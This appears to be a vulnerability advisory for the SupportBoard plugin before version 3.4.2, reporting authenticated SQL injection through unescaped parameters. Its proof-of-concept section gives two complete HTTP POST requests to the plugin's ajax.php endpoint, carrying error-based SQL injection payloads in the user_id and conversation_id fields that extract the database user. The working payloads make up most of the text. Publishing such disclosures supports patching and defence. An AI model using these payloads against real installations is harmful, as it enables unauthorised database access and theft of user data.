SupportBoard < 3.4.2 – Multiple Authenticated SQLi

Description

The plugin does not escape multiple parameters before using them in various SQL statements, which could allow low privilege authenticated attackers to perform SQL Injection attacks

Proof of Concept

POST /supportboard/include/ajax.php HTTP/1.1
Cookie: [user]
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 819
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

function=update-users-last-activity&user_id=2 and updatexml(1,concat(0x7e,select(user()),0x7e),0)&return_user_id=387&check_slack=false&login-cookie=[user]&language=false


POST /supportboard/include/ajax.php HTTP/2
Cookie: [user]
Content-Length: 852
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate

function=get-new-messages&conversation_id=478 and updatexml(1,concat(0x7e,(select user()),0x7e),1)&datetime=2020-02-25+13%3A59%3A54&login-cookie=[user]&user_id=387